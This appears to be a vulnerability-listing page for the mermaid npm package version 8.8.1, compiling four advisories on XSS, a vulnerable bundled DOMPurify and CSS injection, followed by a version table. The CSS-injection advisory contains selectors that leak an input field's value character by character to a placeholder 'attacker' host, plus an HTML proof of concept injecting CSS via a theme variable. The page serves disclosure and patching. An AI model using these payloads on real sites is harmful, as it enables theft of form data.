NodeJS/mermaid/8.8.1
Markdown-ish syntax for generating flowcharts, mindmaps, sequence diagrams, class diagrams, gantt charts, git graphs and more.
https://www.npmjs.com/package/mermaid
MIT
4 Security Vulnerabilities
Cross-site Scripting in Mermaid
- https://nvd.nist.gov/vuln/detail/CVE-2021-35513
- https://github.com/mermaid-js/mermaid/issues/2122
- https://github.com/mermaid-js/mermaid/pull/2123
- https://github.com/mermaid-js/mermaid/pull/2123/commits/3d22fa5d2435de5acc18de6f88474a6e8675a60e
- https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2
- https://github.com/advisories/GHSA-4f6x-49g2-99fm
Mermaid before 8.11.0 allows XSS when the antiscript feature is used.
Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify
- https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674
- https://github.com/mermaid-js/mermaid/security/advisories/GHSA-m4gq-x24j-jpmf
- https://github.com/mermaid-js/mermaid/commit/6c785c93166c151d27d328ddf68a13d9d65adc00
- https://github.com/mermaid-js/mermaid/commit/92a07ffe40aab2769dd1c3431b4eb5beac282b34
- https://github.com/advisories/GHSA-m4gq-x24j-jpmf
The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack.
This affects the built:
dist/mermaid.min.js
dist/mermaid.js
dist/mermaid.esm.mjs
dist/mermaid.esm.min.mjs
This will also affect users that use the above files via a CDN link, e.g. https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js
Users that use the default NPM export of mermaid
, e.g. import mermaid from 'mermaid'
, or the dist/mermaid.core.mjs
file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like npm audit fix
.
Patches
develop
branch: 6c785c93166c151d27d328ddf68a13d9d65adc00- backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34
Incorrect sanitisation function leads to `XSS` in mermaid
- https://github.com/mermaid-js/mermaid/security/advisories/GHSA-p3rp-vmj9-gv6v
- https://nvd.nist.gov/vuln/detail/CVE-2021-43861
- https://github.com/mermaid-js/mermaid/commit/066b7a0d0bda274d94a2f2d21e4323dab5776d83
- https://github.com/mermaid-js/mermaid/releases/tag/8.13.8
- https://github.com/advisories/GHSA-p3rp-vmj9-gv6v
Impact
Malicious diagrams can contain javascript code that can be run at diagram readers machines.
Patches
The users should upgrade to version 8.13.8
Workarounds
You need to upgrade in order to avoid this issue.
Possible inject arbitrary `CSS` into the generated graph affecting the container HTML
An attacker is able to inject arbitrary CSS
into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted CSS
selectors.
The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the value
attribute one character at a time. Whenever there is an actual match, an http
request will be made by the browser in order to load
a background image that will let an attacker know what's the value of the character.
input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); }
...
input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); }
...
input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); }
...
input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); }
Patches
Has the problem been patched? What versions should users upgrade to?
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
References
Are there any links users can visit to find out more?
For more information
If you have any questions or comments about this advisory: * Open an issue in example link to repo * Email us at example email address
Product
mermaid.js
Tested Version
Details
Issue 1: Multiple CSS Injection (GHSL-2022-036
)
By supplying a carefully crafted textColor
theme variable, an attacker can inject arbitrary CSS
rules into the document. In the following snippet we can see that getStyles
does not sanitize any of the theme variables leaving the door open for CSS
injection.
Snippet from src/styles.js:
const getStyles = (type, userStyles, options) => {
return ` {
font-family: ${options.fontFamily};
font-size: ${options.fontSize};
fill: ${options.textColor}
}
For example, if we set textColor
to "green;} #target { background-color: crimson }"
the resulting CSS
will contain a new selector #target
that will apply a crimson
background color to an arbitrary element.
<html>
<body>
<div id="target">
<h1>This element does not belong to the SVG but we can style it</h1>
</div>
<svg id="diagram">
</svg>
<script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script>
<script>
mermaid.initialize({ startOnLoad: false });
const graph =
`
%%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%%
graph TD
A[Goose]
`
const diagram = document.getElementById("diagram")
const svg = mermaid.render('diagram-svg', graph)
diagram.innerHTML = svg
</script>
</body>
</html>
In the proof of concept above we used the textColor
variable to inject CSS
, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points:
- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393
- https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35
Impact
This issue may lead to Information Disclosure
via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc.
Remediation
Ensure that user input is adequately escaped before embedding it in CSS blocks.
235 Other Versions
Version | License | Security | Released | |
---|---|---|---|---|
7.0.12 | MIT | 4 | 2017-09-10 - 14:58 | about 7 years |
7.0.11 | MIT | 4 | 2017-09-09 - 13:49 | about 7 years |
7.0.10 | MIT | 4 | 2017-09-08 - 16:58 | about 7 years |
7.0.9 | MIT | 4 | 2017-09-06 - 03:15 | about 7 years |
7.0.8 | MIT | 4 | 2017-09-03 - 14:18 | about 7 years |
7.0.7 | MIT | 4 | 2017-09-02 - 15:43 | about 7 years |
7.0.6 | MIT | 4 | 2017-09-01 - 13:41 | about 7 years |
7.0.5 | MIT | 4 | 2017-09-01 - 10:39 | about 7 years |
7.0.4 | MIT | 4 | 2017-08-16 - 16:03 | about 7 years |
7.0.3 | MIT | 4 | 2017-06-04 - 04:19 | over 7 years |
7.0.2 | MIT | 4 | 2017-06-01 - 05:42 | over 7 years |
7.0.1 | MIT | 4 | 2017-06-01 - 05:13 | over 7 years |
7.0.0 | MIT | 4 | 2017-01-29 - 11:15 | almost 8 years |
6.0.0 | MIT | 4 | 2016-05-29 - 17:27 | over 8 years |
0.5.8 | MIT | 4 | 2016-01-27 - 14:06 | almost 9 years |
0.5.7 | MIT | 4 | 2016-01-25 - 18:12 | almost 9 years |
0.5.6 | MIT | 4 | 2015-11-22 - 18:09 | almost 9 years |
0.5.5 | MIT | 4 | 2015-10-21 - 19:15 | about 9 years |
0.5.4 | MIT | 4 | 2015-10-19 - 20:09 | about 9 years |
0.5.3 | MIT | 4 | 2015-10-04 - 21:29 | about 9 years |
0.5.2 | MIT | 4 | 2015-10-04 - 21:09 | about 9 years |
0.5.1 | MIT | 4 | 2015-06-21 - 15:27 | over 9 years |
0.5.0 | MIT | 4 | 2015-06-07 - 15:06 | over 9 years |
0.4.0 | MIT | 4 | 2015-03-01 - 15:52 | over 9 years |
0.3.5 | MIT | 4 | 2015-02-15 - 18:38 | over 9 years |
0.3.4 | MIT | 4 | 2015-02-15 - 17:16 | over 9 years |
0.3.3 | MIT | 4 | 2015-01-25 - 15:46 | almost 10 years |
0.3.2 | MIT | 4 | 2015-01-11 - 14:13 | almost 10 years |
0.3.0 | MIT | 4 | 2014-12-22 - 12:55 | almost 10 years |
0.2.16 | MIT | 4 | 2014-12-15 - 18:44 | almost 10 years |
0.2.15 | BSD-2-Clause | 4 | 2014-12-05 - 09:56 | almost 10 years |
0.2.14 | BSD-2-Clause | 4 | 2014-12-03 - 18:36 | almost 10 years |
0.2.13 | BSD-2-Clause | 4 | 2014-12-03 - 18:29 | almost 10 years |
0.2.12 | BSD-2-Clause | 4 | 2014-12-02 - 18:03 | almost 10 years |
0.2.11 | BSD-2-Clause | 4 | 2014-12-02 - 17:39 | almost 10 years |